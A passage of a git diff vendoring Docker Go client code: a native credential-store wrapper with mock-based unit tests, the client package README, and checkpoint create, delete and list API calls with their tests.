NewFileStore(file), + } +} + +// Erase removes the given credentials from the native store. +func (c *nativeStore) Erase(serverAddress string) error { + if err := client.Erase(c.programFunc, serverAddress); err != nil { + return err + } + + // Fallback to plain text store to remove email + return c.fileStore.Erase(serverAddress) +} + +// Get retrieves credentials for a specific server from the native store. +func (c *nativeStore) Get(serverAddress string) (types.AuthConfig, error) { + // load user email if it exist or an empty auth config. 
+ auth, _ := c.fileStore.Get(serverAddress) + + creds, err := c.getCredentialsFromStore(serverAddress) + if err != nil { + return auth, err + } + auth.Username = creds.Username + auth.IdentityToken = creds.IdentityToken + auth.Password = creds.Password + + return auth, nil +} + +// GetAll retrieves all the credentials from the native store. +func (c *nativeStore) GetAll() (map[string]types.AuthConfig, error) { + auths, err := c.listCredentialsInStore() + if err != nil { + return nil, err + } + + // Emails are only stored in the file store. + // This call can be safely eliminated when emails are removed. + fileConfigs, _ := c.fileStore.GetAll() + + authConfigs := make(map[string]types.AuthConfig) + for registry := range auths { + creds, err := c.getCredentialsFromStore(registry) + if err != nil { + return nil, err + } + ac, _ := fileConfigs[registry] // might contain Email + ac.Username = creds.Username + ac.Password = creds.Password + ac.IdentityToken = creds.IdentityToken + authConfigs[registry] = ac + } + + return authConfigs, nil +} + +// Store saves the given credentials in the file store. +func (c *nativeStore) Store(authConfig types.AuthConfig) error { + if err := c.storeCredentialsInStore(authConfig); err != nil { + return err + } + authConfig.Username = "" + authConfig.Password = "" + authConfig.IdentityToken = "" + + // Fallback to old credential in plain text to save only the email + return c.fileStore.Store(authConfig) +} + +// storeCredentialsInStore executes the command to store the credentials in the native store. 
+func (c *nativeStore) storeCredentialsInStore(config types.AuthConfig) error { + creds := &credentials.Credentials{ + ServerURL: config.ServerAddress, + Username: config.Username, + Secret: config.Password, + } + + if config.IdentityToken != "" { + creds.Username = tokenUsername + creds.Secret = config.IdentityToken + } + + return client.Store(c.programFunc, creds) +} + +// getCredentialsFromStore executes the command to get the credentials from the native store. +func (c *nativeStore) getCredentialsFromStore(serverAddress string) (types.AuthConfig, error) { + var ret types.AuthConfig + + creds, err := client.Get(c.programFunc, serverAddress) + if err != nil { + if credentials.IsErrCredentialsNotFound(err) { + // do not return an error if the credentials are not + // in the keyckain. Let docker ask for new credentials. + return ret, nil + } + return ret, err + } + + if creds.Username == tokenUsername { + ret.IdentityToken = creds.Secret + } else { + ret.Password = creds.Secret + ret.Username = creds.Username + } + + ret.ServerAddress = serverAddress + return ret, nil +} + +// listCredentialsInStore returns a listing of stored credentials as a map of +// URL -> username. 
+func (c *nativeStore) listCredentialsInStore() (map[string]string, error) { + return client.List(c.programFunc) +} diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/native_store_test.go b/vendor/github.com/docker/docker/cliconfig/credentials/native_store_test.go new file mode 100644 index 0000000000..7664faf9e1 --- /dev/null +++ b/vendor/github.com/docker/docker/cliconfig/credentials/native_store_test.go @@ -0,0 +1,355 @@ +package credentials + +import ( + "encoding/json" + "fmt" + "io" + "io/ioutil" + "strings" + "testing" + + "github.com/docker/docker-credential-helpers/client" + "github.com/docker/docker-credential-helpers/credentials" + "github.com/docker/docker/api/types" +) + +const ( + validServerAddress = "https://index.docker.io/v1" + validServerAddress2 = "https://example.com:5002" + invalidServerAddress = "https://foobar.example.com" + missingCredsAddress = "https://missing.docker.io/v1" +) + +var errCommandExited = fmt.Errorf("exited 1") + +// mockCommand simulates interactions between the docker client and a remote +// credentials helper. +// Unit tests inject this mocked command into the remote to control execution. +type mockCommand struct { + arg string + input io.Reader +} + +// Output returns responses from the remote credentials helper. +// It mocks those responses based in the input in the mock. 
+func (m *mockCommand) Output() ([]byte, error) { + in, err := ioutil.ReadAll(m.input) + if err != nil { + return nil, err + } + inS := string(in) + + switch m.arg { + case "erase": + switch inS { + case validServerAddress: + return nil, nil + default: + return []byte("program failed"), errCommandExited + } + case "get": + switch inS { + case validServerAddress: + return []byte(`{"Username": "foo", "Secret": "bar"}`), nil + case validServerAddress2: + return []byte(`{"Username": "", "Secret": "abcd1234"}`), nil + case missingCredsAddress: + return []byte(credentials.NewErrCredentialsNotFound().Error()), errCommandExited + case invalidServerAddress: + return []byte("program failed"), errCommandExited + } + case "store": + var c credentials.Credentials + err := json.NewDecoder(strings.NewReader(inS)).Decode(&c) + if err != nil { + return []byte("program failed"), errCommandExited + } + switch c.ServerURL { + case validServerAddress: + return nil, nil + default: + return []byte("program failed"), errCommandExited + } + case "list": + return []byte(fmt.Sprintf(`{"%s": "%s", "%s": "%s"}`, validServerAddress, "foo", validServerAddress2, "")), nil + } + + return []byte(fmt.Sprintf("unknown argument %q with %q", m.arg, inS)), errCommandExited +} + +// Input sets the input to send to a remote credentials helper. 
+func (m *mockCommand) Input(in io.Reader) { + m.input = in +} + +func mockCommandFn(args ...string) client.Program { + return &mockCommand{ + arg: args[0], + } +} + +func TestNativeStoreAddCredentials(t *testing.T) { + f := newConfigFile(make(map[string]types.AuthConfig)) + f.CredentialsStore = "mock" + + s := &nativeStore{ + programFunc: mockCommandFn, + fileStore: NewFileStore(f), + } + err := s.Store(types.AuthConfig{ + Username: "foo", + Password: "bar", + Email: "foo@example.com", + ServerAddress: validServerAddress, + }) + + if err != nil { + t.Fatal(err) + } + + if len(f.AuthConfigs) != 1 { + t.Fatalf("expected 1 auth config, got %d", len(f.AuthConfigs)) + } + + a, ok := f.AuthConfigs[validServerAddress] + if !ok { + t.Fatalf("expected auth for %s, got %v", validServerAddress, f.AuthConfigs) + } + if a.Auth != "" { + t.Fatalf("expected auth to be empty, got %s", a.Auth) + } + if a.Username != "" { + t.Fatalf("expected username to be empty, got %s", a.Username) + } + if a.Password != "" { + t.Fatalf("expected password to be empty, got %s", a.Password) + } + if a.IdentityToken != "" { + t.Fatalf("expected identity token to be empty, got %s", a.IdentityToken) + } + if a.Email != "foo@example.com" { + t.Fatalf("expected email `foo@example.com`, got %s", a.Email) + } +} + +func TestNativeStoreAddInvalidCredentials(t *testing.T) { + f := newConfigFile(make(map[string]types.AuthConfig)) + f.CredentialsStore = "mock" + + s := &nativeStore{ + programFunc: mockCommandFn, + fileStore: NewFileStore(f), + } + err := s.Store(types.AuthConfig{ + Username: "foo", + Password: "bar", + Email: "foo@example.com", + ServerAddress: invalidServerAddress, + }) + + if err == nil { + t.Fatal("expected error, got nil") + } + + if !strings.Contains(err.Error(), "program failed") { + t.Fatalf("expected `program failed`, got %v", err) + } + + if len(f.AuthConfigs) != 0 { + t.Fatalf("expected 0 auth config, got %d", len(f.AuthConfigs)) + } +} + +func TestNativeStoreGet(t *testing.T) { + 
f := newConfigFile(map[string]types.AuthConfig{ + validServerAddress: { + Email: "foo@example.com", + }, + }) + f.CredentialsStore = "mock" + + s := &nativeStore{ + programFunc: mockCommandFn, + fileStore: NewFileStore(f), + } + a, err := s.Get(validServerAddress) + if err != nil { + t.Fatal(err) + } + + if a.Username != "foo" { + t.Fatalf("expected username `foo`, got %s", a.Username) + } + if a.Password != "bar" { + t.Fatalf("expected password `bar`, got %s", a.Password) + } + if a.IdentityToken != "" { + t.Fatalf("expected identity token to be empty, got %s", a.IdentityToken) + } + if a.Email != "foo@example.com" { + t.Fatalf("expected email `foo@example.com`, got %s", a.Email) + } +} + +func TestNativeStoreGetIdentityToken(t *testing.T) { + f := newConfigFile(map[string]types.AuthConfig{ + validServerAddress2: { + Email: "foo@example2.com", + }, + }) + f.CredentialsStore = "mock" + + s := &nativeStore{ + programFunc: mockCommandFn, + fileStore: NewFileStore(f), + } + a, err := s.Get(validServerAddress2) + if err != nil { + t.Fatal(err) + } + + if a.Username != "" { + t.Fatalf("expected username to be empty, got %s", a.Username) + } + if a.Password != "" { + t.Fatalf("expected password to be empty, got %s", a.Password) + } + if a.IdentityToken != "abcd1234" { + t.Fatalf("expected identity token `abcd1234`, got %s", a.IdentityToken) + } + if a.Email != "foo@example2.com" { + t.Fatalf("expected email `foo@example2.com`, got %s", a.Email) + } +} + +func TestNativeStoreGetAll(t *testing.T) { + f := newConfigFile(map[string]types.AuthConfig{ + validServerAddress: { + Email: "foo@example.com", + }, + }) + f.CredentialsStore = "mock" + + s := &nativeStore{ + programFunc: mockCommandFn, + fileStore: NewFileStore(f), + } + as, err := s.GetAll() + if err != nil { + t.Fatal(err) + } + + if len(as) != 2 { + t.Fatalf("wanted 2, got %d", len(as)) + } + + if as[validServerAddress].Username != "foo" { + t.Fatalf("expected username `foo` for %s, got %s", validServerAddress, 
as[validServerAddress].Username) + } + if as[validServerAddress].Password != "bar" { + t.Fatalf("expected password `bar` for %s, got %s", validServerAddress, as[validServerAddress].Password) + } + if as[validServerAddress].IdentityToken != "" { + t.Fatalf("expected identity to be empty for %s, got %s", validServerAddress, as[validServerAddress].IdentityToken) + } + if as[validServerAddress].Email != "foo@example.com" { + t.Fatalf("expected email `foo@example.com` for %s, got %s", validServerAddress, as[validServerAddress].Email) + } + if as[validServerAddress2].Username != "" { + t.Fatalf("expected username to be empty for %s, got %s", validServerAddress2, as[validServerAddress2].Username) + } + if as[validServerAddress2].Password != "" { + t.Fatalf("expected password to be empty for %s, got %s", validServerAddress2, as[validServerAddress2].Password) + } + if as[validServerAddress2].IdentityToken != "abcd1234" { + t.Fatalf("expected identity token `abcd1324` for %s, got %s", validServerAddress2, as[validServerAddress2].IdentityToken) + } + if as[validServerAddress2].Email != "" { + t.Fatalf("expected no email for %s, got %s", validServerAddress2, as[validServerAddress2].Email) + } +} + +func TestNativeStoreGetMissingCredentials(t *testing.T) { + f := newConfigFile(map[string]types.AuthConfig{ + validServerAddress: { + Email: "foo@example.com", + }, + }) + f.CredentialsStore = "mock" + + s := &nativeStore{ + programFunc: mockCommandFn, + fileStore: NewFileStore(f), + } + _, err := s.Get(missingCredsAddress) + if err != nil { + // missing credentials do not produce an error + t.Fatal(err) + } +} + +func TestNativeStoreGetInvalidAddress(t *testing.T) { + f := newConfigFile(map[string]types.AuthConfig{ + validServerAddress: { + Email: "foo@example.com", + }, + }) + f.CredentialsStore = "mock" + + s := &nativeStore{ + programFunc: mockCommandFn, + fileStore: NewFileStore(f), + } + _, err := s.Get(invalidServerAddress) + if err == nil { + t.Fatal("expected error, got 
nil") + } + + if !strings.Contains(err.Error(), "program failed") { + t.Fatalf("expected `program failed`, got %v", err) + } +} + +func TestNativeStoreErase(t *testing.T) { + f := newConfigFile(map[string]types.AuthConfig{ + validServerAddress: { + Email: "foo@example.com", + }, + }) + f.CredentialsStore = "mock" + + s := &nativeStore{ + programFunc: mockCommandFn, + fileStore: NewFileStore(f), + } + err := s.Erase(validServerAddress) + if err != nil { + t.Fatal(err) + } + + if len(f.AuthConfigs) != 0 { + t.Fatalf("expected 0 auth configs, got %d", len(f.AuthConfigs)) + } +} + +func TestNativeStoreEraseInvalidAddress(t *testing.T) { + f := newConfigFile(map[string]types.AuthConfig{ + validServerAddress: { + Email: "foo@example.com", + }, + }) + f.CredentialsStore = "mock" + + s := &nativeStore{ + programFunc: mockCommandFn, + fileStore: NewFileStore(f), + } + err := s.Erase(invalidServerAddress) + if err == nil { + t.Fatal("expected error, got nil") + } + + if !strings.Contains(err.Error(), "program failed") { + t.Fatalf("expected `program failed`, got %v", err) + } +} diff --git a/vendor/github.com/docker/docker/client/README.md b/vendor/github.com/docker/docker/client/README.md new file mode 100644 index 0000000000..059dfb3ce7 --- /dev/null +++ b/vendor/github.com/docker/docker/client/README.md @@ -0,0 +1,35 @@ +# Go client for the Docker Engine API + +The `docker` command uses this package to communicate with the daemon. It can also be used by your own Go applications to do anything the command-line interface does – running containers, pulling images, managing swarms, etc. 
+ +For example, to list running containers (the equivalent of `docker ps`): + +```go +package main + +import ( + "context" + "fmt" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/client" +) + +func main() { + cli, err := client.NewEnvClient() + if err != nil { + panic(err) + } + + containers, err := cli.ContainerList(context.Background(), types.ContainerListOptions{}) + if err != nil { + panic(err) + } + + for _, container := range containers { + fmt.Printf("%s %s\n", container.ID[:10], container.Image) + } +} +``` + +[Full documentation is available on GoDoc.](https://godoc.org/github.com/docker/docker/client) diff --git a/vendor/github.com/docker/docker/client/checkpoint_create.go b/vendor/github.com/docker/docker/client/checkpoint_create.go new file mode 100644 index 0000000000..0effe498be --- /dev/null +++ b/vendor/github.com/docker/docker/client/checkpoint_create.go @@ -0,0 +1,13 @@ +package client + +import ( + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// CheckpointCreate creates a checkpoint from the given container with the given name +func (cli *Client) CheckpointCreate(ctx context.Context, container string, options types.CheckpointCreateOptions) error { + resp, err := cli.post(ctx, "/containers/"+container+"/checkpoints", nil, options, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/checkpoint_create_test.go b/vendor/github.com/docker/docker/client/checkpoint_create_test.go new file mode 100644 index 0000000000..96e5187618 --- /dev/null +++ b/vendor/github.com/docker/docker/client/checkpoint_create_test.go @@ -0,0 +1,73 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +func TestCheckpointCreateError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server 
error")), + } + err := client.CheckpointCreate(context.Background(), "nothing", types.CheckpointCreateOptions{ + CheckpointID: "noting", + Exit: true, + }) + + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestCheckpointCreate(t *testing.T) { + expectedContainerID := "container_id" + expectedCheckpointID := "checkpoint_id" + expectedURL := "/containers/container_id/checkpoints" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + + if req.Method != "POST" { + return nil, fmt.Errorf("expected POST method, got %s", req.Method) + } + + createOptions := &types.CheckpointCreateOptions{} + if err := json.NewDecoder(req.Body).Decode(createOptions); err != nil { + return nil, err + } + + if createOptions.CheckpointID != expectedCheckpointID { + return nil, fmt.Errorf("expected CheckpointID to be 'checkpoint_id', got %v", createOptions.CheckpointID) + } + + if !createOptions.Exit { + return nil, fmt.Errorf("expected Exit to be true") + } + + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + + err := client.CheckpointCreate(context.Background(), expectedContainerID, types.CheckpointCreateOptions{ + CheckpointID: expectedCheckpointID, + Exit: true, + }) + + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/checkpoint_delete.go b/vendor/github.com/docker/docker/client/checkpoint_delete.go new file mode 100644 index 0000000000..e6e75588b1 --- /dev/null +++ b/vendor/github.com/docker/docker/client/checkpoint_delete.go @@ -0,0 +1,20 @@ +package client + +import ( + "net/url" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// CheckpointDelete deletes the checkpoint 
with the given name from the given container +func (cli *Client) CheckpointDelete(ctx context.Context, containerID string, options types.CheckpointDeleteOptions) error { + query := url.Values{} + if options.CheckpointDir != "" { + query.Set("dir", options.CheckpointDir) + } + + resp, err := cli.delete(ctx, "/containers/"+containerID+"/checkpoints/"+options.CheckpointID, query, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/checkpoint_delete_test.go b/vendor/github.com/docker/docker/client/checkpoint_delete_test.go new file mode 100644 index 0000000000..a78b050487 --- /dev/null +++ b/vendor/github.com/docker/docker/client/checkpoint_delete_test.go @@ -0,0 +1,54 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +func TestCheckpointDeleteError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + err := client.CheckpointDelete(context.Background(), "container_id", types.CheckpointDeleteOptions{ + CheckpointID: "checkpoint_id", + }) + + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestCheckpointDelete(t *testing.T) { + expectedURL := "/containers/container_id/checkpoints/checkpoint_id" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "DELETE" { + return nil, fmt.Errorf("expected DELETE method, got %s", req.Method) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + + err := client.CheckpointDelete(context.Background(), "container_id", 
types.CheckpointDeleteOptions{ + CheckpointID: "checkpoint_id", + }) + + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/checkpoint_list.go b/vendor/github.com/docker/docker/client/checkpoint_list.go new file mode 100644 index 0000000000..8eb720a6b2 --- /dev/null +++ b/vendor/github.com/docker/docker/client/checkpoint_list.go @@ -0,0 +1,28 @@ +package client + +import ( + "encoding/json" + "net/url" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// CheckpointList returns the volumes configured in the docker host. +func (cli *Client) CheckpointList(ctx context.Context, container string, options types.CheckpointListOptions) ([]types.Checkpoint, error) { + var checkpoints []types.Checkpoint + + query := url.Values{} + if options.CheckpointDir != "" { + query.Set("dir", options.CheckpointDir) + } + + resp, err := cli.get(ctx, "/containers/"+container+"/checkpoints", query, nil) + if err != nil { + return checkpoints, err + } + + err = json.NewDecoder(resp.body).Decode(&checkpoints) + ensureReaderClosed(resp) + return checkpoints, err +} diff --git a/vendor/github.com/docker/docker/client/checkpoint_list_test.go b/vendor/github.com/docker/docker/client/checkpoint_list_test.go new file mode 100644 index 0000000000..6c90f61e8c --- /dev/null +++ b/vendor/github.com/docker/docker/client/checkpoint_list_test.go @@ -0,0 +1,57 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +func TestCheckpointListError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, err := client.CheckpointList(context.Background(), "container_id", types.CheckpointListOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + 
+func TestCheckpointList(t *testing.T) { + expectedURL := "/containers/container_id/checkpoints" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + content, err := json.Marshal([]types.Checkpoint{ + { + Name: "checkpoint", + }, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + checkpoints, err := client.CheckpointList(context.Background(), "container_id", types.CheckpointListOptions{}) + if err != nil { + t.Fatal(err) + } + if len(checkpoints) != 1 { + t.Fatalf("expected 1 checkpoint, got %v", checkpoints) + } +} diff --git a/vendor/github.com/docker/docker/client/client.go b/vendor/github.com/docker/docker/client/client.go new file mode 100644 index 0000000000..a9bdab6bb6 --- /dev/null +++ b/vendor/github.com/docker/docker/client/client.go @@ -0,0 +1,246 @@ +/* +Package client is a Go client for the Docker Engine API. + +The "docker" command uses this package to communicate with the daemon. It can also +be used by your own Go applications to do anything the command-line interface does +– running containers, pulling images, managing swarms, etc. + +For more information about the Engine API, see the documentation: +https://docs.docker.com/engine/reference/api/ + +Usage + +You use the library by creating a client object and calling methods on it. The +client can be created either from environment variables with NewEnvClient, or +configured manually with NewClient. 
+ +For example, to list running containers (the equivalent of "docker ps"): + + package main + + import ( + "context" + "fmt" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/client" + ) + + func main() { + cli, err := client.NewEnvClient() + if err != nil { + panic(err) + } + + containers, err := cli.ContainerList(context.Background(), types.ContainerListOptions{}) + if err != nil { + panic(err) + } + + for _, container := range containers { + fmt.Printf("%s %s\n", container.ID[:10], container.Image) + } + } + +*/ +package client + +import ( + "fmt" + "net/http" + "net/url" + "os" + "path/filepath" + "strings" + + "github.com/docker/go-connections/sockets" + "github.com/docker/go-connections/tlsconfig" +) + +// DefaultVersion is the version of the current stable API +const DefaultVersion string = "1.25" + +// Client is the API client that performs all operations +// against a docker server. +type Client struct { + // scheme sets the scheme for the client + scheme string + // host holds the server address to connect to + host string + // proto holds the client protocol i.e. unix. + proto string + // addr holds the client address. + addr string + // basePath holds the path to prepend to the requests. + basePath string + // client used to send and receive http requests. + client *http.Client + // version of the server to talk to. + version string + // custom http headers configured by users. + customHTTPHeaders map[string]string + // manualOverride is set to true when the version was set by users. + manualOverride bool +} + +// NewEnvClient initializes a new API client based on environment variables. +// Use DOCKER_HOST to set the url to the docker server. +// Use DOCKER_API_VERSION to set the version of the API to reach, leave empty for latest. +// Use DOCKER_CERT_PATH to load the tls certificates from. +// Use DOCKER_TLS_VERIFY to enable or disable TLS verification, off by default. 
+func NewEnvClient() (*Client, error) { + var client *http.Client + if dockerCertPath := os.Getenv("DOCKER_CERT_PATH"); dockerCertPath != "" { + options := tlsconfig.Options{ + CAFile: filepath.Join(dockerCertPath, "ca.pem"), + CertFile: filepath.Join(dockerCertPath, "cert.pem"), + KeyFile: filepath.Join(dockerCertPath, "key.pem"), + InsecureSkipVerify: os.Getenv("DOCKER_TLS_VERIFY") == "", + } + tlsc, err := tlsconfig.Client(options) + if err != nil { + return nil, err + } + + client = &http.Client{ + Transport: &http.Transport{ + TLSClientConfig: tlsc, + }, + } + } + + host := os.Getenv("DOCKER_HOST") + if host == "" { + host = DefaultDockerHost + } + version := os.Getenv("DOCKER_API_VERSION") + if version == "" { + version = DefaultVersion + } + + cli, err := NewClient(host, version, client, nil) + if err != nil { + return cli, err + } + if os.Getenv("DOCKER_API_VERSION") != "" { + cli.manualOverride = true + } + return cli, nil +} + +// NewClient initializes a new API client for the given host and API version. +// It uses the given http client as transport. +// It also initializes the custom http headers to add to each request. +// +// It won't send any version information if the version number is empty. It is +// highly recommended that you set a version or your client may break if the +// server is upgraded. 
+func NewClient(host string, version string, client *http.Client, httpHeaders map[string]string) (*Client, error) { + proto, addr, basePath, err := ParseHost(host) + if err != nil { + return nil, err + } + + if client != nil { + if _, ok := client.Transport.(*http.Transport); !ok { + return nil, fmt.Errorf("unable to verify TLS configuration, invalid transport %v", client.Transport) + } + } else { + transport := new(http.Transport) + sockets.ConfigureTransport(transport, proto, addr) + client = &http.Client{ + Transport: transport, + } + } + + scheme := "http" + tlsConfig := resolveTLSConfig(client.Transport) + if tlsConfig != nil { + // TODO(stevvooe): This isn't really the right way to write clients in Go. + // `NewClient` should probably only take an `*http.Client` and work from there. + // Unfortunately, the model of having a host-ish/url-thingy as the connection + // string has us confusing protocol and transport layers. We continue doing + // this to avoid breaking existing clients but this should be addressed. + scheme = "https" + } + + return &Client{ + scheme: scheme, + host: host, + proto: proto, + addr: addr, + basePath: basePath, + client: client, + version: version, + customHTTPHeaders: httpHeaders, + }, nil +} + +// Close ensures that transport.Client is closed +// especially needed while using NewClient with *http.Client = nil +// for example +// client.NewClient("unix:///var/run/docker.sock", nil, "v1.18", map[string]string{"User-Agent": "engine-api-cli-1.0"}) +func (cli *Client) Close() error { + + if t, ok := cli.client.Transport.(*http.Transport); ok { + t.CloseIdleConnections() + } + + return nil +} + +// getAPIPath returns the versioned request path to call the api. +// It appends the query parameters to the path if they are not empty. 
+func (cli *Client) getAPIPath(p string, query url.Values) string { + var apiPath string + if cli.version != "" { + v := strings.TrimPrefix(cli.version, "v") + apiPath = fmt.Sprintf("%s/v%s%s", cli.basePath, v, p) + } else { + apiPath = fmt.Sprintf("%s%s", cli.basePath, p) + } + + u := &url.URL{ + Path: apiPath, + } + if len(query) > 0 { + u.RawQuery = query.Encode() + } + return u.String() +} + +// ClientVersion returns the version string associated with this +// instance of the Client. Note that this value can be changed +// via the DOCKER_API_VERSION env var. +func (cli *Client) ClientVersion() string { + return cli.version +} + +// UpdateClientVersion updates the version string associated with this +// instance of the Client. +func (cli *Client) UpdateClientVersion(v string) { + if !cli.manualOverride { + cli.version = v + } + +} + +// ParseHost verifies that the given host strings is valid. +func ParseHost(host string) (string, string, string, error) { + protoAddrParts := strings.SplitN(host, "://", 2) + if len(protoAddrParts) == 1 { + return "", "", "", fmt.Errorf("unable to parse docker host `%s`", host) + } + + var basePath string + proto, addr := protoAddrParts[0], protoAddrParts[1] + if proto == "tcp" { + parsed, err := url.Parse("tcp://" + addr) + if err != nil { + return "", "", "", err + } + addr = parsed.Host + basePath = parsed.Path + } + return proto, addr, basePath, nil +} diff --git a/vendor/github.com/docker/docker/client/client_mock_test.go b/vendor/github.com/docker/docker/client/client_mock_test.go new file mode 100644 index 0000000000..0ab935d536 --- /dev/null +++ b/vendor/github.com/docker/docker/client/client_mock_test.go @@ -0,0 +1,45 @@ +package client + +import ( + "bytes" + "encoding/json" + "io/ioutil" + "net/http" + + "github.com/docker/docker/api/types" +) + +func newMockClient(doer func(*http.Request) (*http.Response, error)) *http.Client { + return &http.Client{ + Transport: transportFunc(doer), + } +} + +func errorMock(statusCode 
int, message string) func(req *http.Request) (*http.Response, error) { + return func(req *http.Request) (*http.Response, error) { + header := http.Header{} + header.Set("Content-Type", "application/json") + + body, err := json.Marshal(&types.ErrorResponse{ + Message: message, + }) + if err != nil { + return nil, err + } + + return &http.Response{ + StatusCode: statusCode, + Body: ioutil.NopCloser(bytes.NewReader(body)), + Header: header, + }, nil + } +} + +func plainTextErrorMock(statusCode int, message string) func(req *http.Request) (*http.Response, error) { + return func(req *http.Request) (*http.Response, error) { + return &http.Response{ + StatusCode: statusCode, + Body: ioutil.NopCloser(bytes.NewReader([]byte(message))), + }, nil + } +} diff --git a/vendor/github.com/docker/docker/client/client_test.go b/vendor/github.com/docker/docker/client/client_test.go new file mode 100644 index 0000000000..ee199c2bec --- /dev/null +++ b/vendor/github.com/docker/docker/client/client_test.go @@ -0,0 +1,283 @@ +package client + +import ( + "bytes" + "encoding/json" + "io/ioutil" + "net/http" + "net/url" + "os" + "runtime" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +func TestNewEnvClient(t *testing.T) { + if runtime.GOOS == "windows" { + t.Skip("skipping unix only test for windows") + } + cases := []struct { + envs map[string]string + expectedError string + expectedVersion string + }{ + { + envs: map[string]string{}, + expectedVersion: DefaultVersion, + }, + { + envs: map[string]string{ + "DOCKER_CERT_PATH": "invalid/path", + }, + expectedError: "Could not load X509 key pair: open invalid/path/cert.pem: no such file or directory. 
Make sure the key is not encrypted", + }, + { + envs: map[string]string{ + "DOCKER_CERT_PATH": "testdata/", + }, + expectedVersion: DefaultVersion, + }, + { + envs: map[string]string{ + "DOCKER_CERT_PATH": "testdata/", + "DOCKER_TLS_VERIFY": "1", + }, + expectedVersion: DefaultVersion, + }, + { + envs: map[string]string{ + "DOCKER_CERT_PATH": "testdata/", + "DOCKER_HOST": "https://notaunixsocket", + }, + expectedVersion: DefaultVersion, + }, + { + envs: map[string]string{ + "DOCKER_HOST": "host", + }, + expectedError: "unable to parse docker host `host`", + }, + { + envs: map[string]string{ + "DOCKER_HOST": "invalid://url", + }, + expectedVersion: DefaultVersion, + }, + { + envs: map[string]string{ + "DOCKER_API_VERSION": "anything", + }, + expectedVersion: "anything", + }, + { + envs: map[string]string{ + "DOCKER_API_VERSION": "1.22", + }, + expectedVersion: "1.22", + }, + } + for _, c := range cases { + recoverEnvs := setupEnvs(t, c.envs) + apiclient, err := NewEnvClient() + if c.expectedError != "" { + if err == nil { + t.Errorf("expected an error for %v", c) + } else if err.Error() != c.expectedError { + t.Errorf("expected an error %s, got %s, for %v", c.expectedError, err.Error(), c) + } + } else { + if err != nil { + t.Error(err) + } + version := apiclient.ClientVersion() + if version != c.expectedVersion { + t.Errorf("expected %s, got %s, for %v", c.expectedVersion, version, c) + } + } + + if c.envs["DOCKER_TLS_VERIFY"] != "" { + // pedantic checking that this is handled correctly + tr := apiclient.client.Transport.(*http.Transport) + if tr.TLSClientConfig == nil { + t.Errorf("no tls config found when DOCKER_TLS_VERIFY enabled") + } + + if tr.TLSClientConfig.InsecureSkipVerify { + t.Errorf("tls verification should be enabled") + } + } + + recoverEnvs(t) + } +} + +func setupEnvs(t *testing.T, envs map[string]string) func(*testing.T) { + oldEnvs := map[string]string{} + for key, value := range envs { + oldEnv := os.Getenv(key) + oldEnvs[key] = oldEnv + err := 
